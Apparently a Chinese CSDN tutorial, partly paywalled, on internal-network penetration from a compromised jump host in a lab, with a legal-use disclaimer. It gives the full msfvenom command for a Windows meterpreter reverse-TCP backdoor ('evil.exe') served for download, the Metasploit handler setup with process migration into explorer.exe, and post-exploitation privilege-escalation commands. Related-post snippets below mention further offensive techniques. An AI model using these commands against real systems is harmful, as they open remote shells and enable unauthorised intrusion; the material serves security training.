内网安全之:内网渗透流程

最新推荐文章于 2024-08-07 15:34:39 发布
最新推荐文章于 2024-08-07 15:34:39 发布
阅读量1w 收藏 121
点赞数 7
分类专栏: Metasploit 文章标签: 内网安全 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f_carey/article/details/120248086
版权
本文详细介绍了内网渗透的流程,包括建立meterpreter反向连接,信息收集,添加持久后门,扫描内网主机和端口,以及利用SOCKS代理和MSF模块进行攻击。强调了实验环境的安全使用,并提醒读者不得用于非法活动。
摘要由CSDN通过智能技术生成

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

内网渗透流程

1 前提

利用已经控制的一台计算机作为入侵内网的跳板,在其他内网计算机看来访问全部来自于跳板机(WEB Server)

2 实验环境

image-20210907114012925

2.1 建立 meterpreter 反向连接

  1. 生成 Metaspolit 后门程序

    msfvenom  -p windows/meterpreter/reverse_tcp lhost=192.168.0.2 lport=4444 -f exe > /var/www/html/evil.exe

  2. kali 配置监听 meterpreter 反向连接,并自动将恶意软件的进程迁移至 explorer.exe

    use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.2
set autorunscript migrate -n explorer.exe
run

  3. WEB Server 下载 Metaspolit 后门程序,并打开程序

  4. meterpreter 反向连接建立成功

    image-20210907090333652

2.2 收集信息提升权限

ipconfig      Display interfaces
route         View and modify the routing table
getuid        Get the user that the server is running as 查看当前用户
getprivs      Attempt to enable all privileges available to the current process 尽可能提升权限
getsystem     Attempt to elevate your privilege to that of local system. 通过各种攻击向量来提升本地系统权限
ps            List running processes 列出进程
</
最低0.47元/天 解锁文章
f_carey
关注
专栏目录
红队内网攻防渗透:内网渗透之Windows内网信息收集:内网和域
HACKONE的博客
04-10 231
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全网关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
内网渗透流程与思路和工具讲解
04-10
内网渗透流程与思路和工具讲解
把手教你如何进行内网渗透
最新发布
wananxuexihu的博客
08-07 652
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
渗透实战:内网域渗透_内网渗透实例
Python84310366的博客
07-01 823
本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使用了msf、CobaltStrike、frp、chisel、SharpSQLTools等工具,最后通过约束委派拿下了域控。其间运用了很多小工具,文章较长,下面开始此次渗透长途之旅。
一次完整的渗透测试流程
HIM_MRY的博客
08-30 6447
渗透测试 渗透测试就是利用我们所掌握的渗透知识,对网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后撰写一篇测试报告,提供给我们的客户。客户根据我们撰写的测试报告,对网站进行漏洞修补,以防止黑客的入侵! 渗透测试的前提是我们得经过用户的授权,才可以对网站进行渗透。如果我们没有经过客户的授权而对一个网站进行渗透测试的话,这是违法的。去年的6.1日我国颁布了《网络安全法》,对网络犯罪有了法律约束,不懂的移步——> 网络安全法 渗透测试分为白盒测试和黑盒测试 1.白盒测试就...
手把手教你如何进行内网渗透
热门推荐
iO快到碗里来
11-19 8万+
0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 内网相关概念这里不再进行介绍,大家可以自行百度,诸如什么是域、域与工作组的区别、什么是DC、什么是AD等。当然,概念是生涩难懂的,结合实际环境会有助于理解。 0x01 信息收集 systeminfo 查看系统详细信息,如OS版本、补丁安装情况,可以根据这些信息筛选可利用的漏洞。 net start 查看启动进
完整的内网渗透经历
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
08-03 1381
因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。 简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。 所以这里直接尝试cs自带的Scripted Web Delivery模块,直接创建一个web服务用于一键下载和执行powershell。 运行刚刚生成的powershell 这边的CS成功上线。 这里我们先来看看系统的信息。
内网渗透步骤
weixin_42583683的博客
01-01 1007
内网渗透步骤包括以下几个步骤: 信息收集:收集有关目标网络的信息,包括 IP 地址范围、操作系统、网络拓扑结构、开放端口和服务等。 漏洞分析:分析目标网络中存在的漏洞,并找出可以利用的漏洞进行攻击。 攻击尝试:尝试利用找到的漏洞进行攻击,获取对目标网络的访问权限。 权限提升:在获得访问权限后,尝试通过各种手段提升自己在目标网络中的权限。 持久化访问:确保在目标网络中的访问权限能够持久保留...
内网渗透 | 手把手教你如何进行内网渗透
mingyqf的博客
07-01 2736
发布于2020-02-17 16:42:26阅读 4K0目录结构[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Iz2F7mzJ-1656677584270)(https://ask.qcloudimg.com/http-save/yehe-5957324/0v0eirg7bb.png?imageView2/2/w/1620)]首页看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin后台尝试爆破弱口令admin1234但是找了一圈并没有发现有什么可
内网渗透知识基础及流程
bylfsj的博客
02-28 6277
  前言 现在网上内网渗透、域渗透文章很多,大多数人只知道如何进行操作获取全新,不知使用该技术的原理和该技术操作影响Windows何种功能,Windows何种机制对内网渗透产生的影响。本文按照数个Windows系统的功能进行讲解,完善内网渗透知识结构。   要点 SAM Hash Active Directory Kerberos SMB IPC NetBIOS LLM...
内网渗透指南
11-13
内网渗透指南。获取目标的主机存活信息和端口开放信息后,就可以尝试分析目标的网络结构,安全防御策略。按照办公网和生产网分别说一下。
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
【工控安全职业证书技能实践:内网横向渗透测试与实战】 工控安全涉及的是工业控制系统中的网络安全,它要求专业人士具备识别、防范和应对安全威胁的能力。本实践课程旨在教授学员如何进行内网横向渗透测试,模拟...
红队内网攻防渗透:内网渗透内网各种工具平台的使用
HACKONE的博客
04-10 351
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
红队内网攻防渗透:内网渗透之windows内网权限提升技术:MSSQL&MYSQL&REDIS&Memcached&PostgreSQL&Teamviewer
HACKONE的博客
06-01 448
将这三个文件放在同一个目录下,并在当前目录执行python cve-2023-38831-exp-gen.py test.png script.bat poc.rar获得验证文件qq.rar。通过查询里面的配置信息来进行其他漏洞利用,这个本身是没有利用漏洞,比如获取里面其他数据库配置信息登录提权。3、计算机用户或WEB权限:Winrar(CVE-2023-38831)下载cve的poc,使用cs制作cs木马,并放进去一个pdf作为载体。Oracle:(站库分离,非JSP,直接数据库到系统等)
内网渗透过程
qq_21383109的博客
10-17 207
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。run #执行已有的模块,输入run后按两下tab,列出已有的脚本。sessions -i <ID值> #进入指定会话。background #将当前会话放置后台。sessions -k #杀死指定会话。getpid # 获取当前进程的pid。sessions # 列出后台会话。Meterpreter基本命令。使用proxifier设置代理。
内网渗透-实战|手把手教你如何进行内网渗透
lza20001103的博客
04-14 4289
内网渗透-实战|手把手教你如何进行内网渗透
网络安全——内网渗透完整流程
xnxqwzy的博客
12-25 1406
因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用fofa来批量了一波weblogic,不出一会便找到了目标。简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦powershell),有内网环境。所以这里直接尝试cs自带的Scripted Web Delivery模块,直接创建一个web服务用于一键下载和执行powershell。运行刚刚生成的powershell这边的CS成功上线。
浅谈内网渗透
crystal0011的专栏
06-15 808
转自:freebuf.com 引子 离上篇文章的时间过去很久了,答应写一篇内网渗透的文章,今天抽点时间,把这个坑给添平了吧。标题是浅谈,所以我不认为自己能在内网渗透写的有多深入。渗透这玩意更多是经验,积累的多了自然水到渠成。而且我个人认为很多前辈人物都已经写的很好了,我这里纯粹抛砖引玉,把前辈级人物的经验集成在一起,也算基础篇吧。如果有不足的地方或者有更好的实现方法,欢迎随时交流。交流方式就以
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值